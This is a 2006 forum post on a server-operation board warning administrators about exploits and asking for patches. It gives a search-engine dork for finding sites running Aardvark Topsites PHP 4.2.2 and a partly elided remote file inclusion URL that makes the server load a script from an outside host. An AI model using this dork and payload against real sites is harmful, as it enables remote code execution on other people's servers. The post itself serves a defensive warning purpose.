Exploits to watch out for

Discussion in 'Server Operation' started by sbovisjb1, Apr 30, 2006.

  1. sbovisjb1

    sbovisjb1 ISPConfig Developer ISPConfig Developer

    WATCH out for these and tell me if you have developed a method/patch for fixing them, these exploits are highly volatile.

    Title: Aardvark Topsites PHP 4.2.2 remote file inclusion
    URL: http://www.aardvarktopsitesphp.com/
    Dork: "Powered By Aardvark Topsites PHP 4.2.2"

    Exploit: /sources/join.php?FORM=owned&CONFIG[captcha]=1&CONFIG[pat...enda=http://www.yourspace.com/yourscript.txt?

Share This Page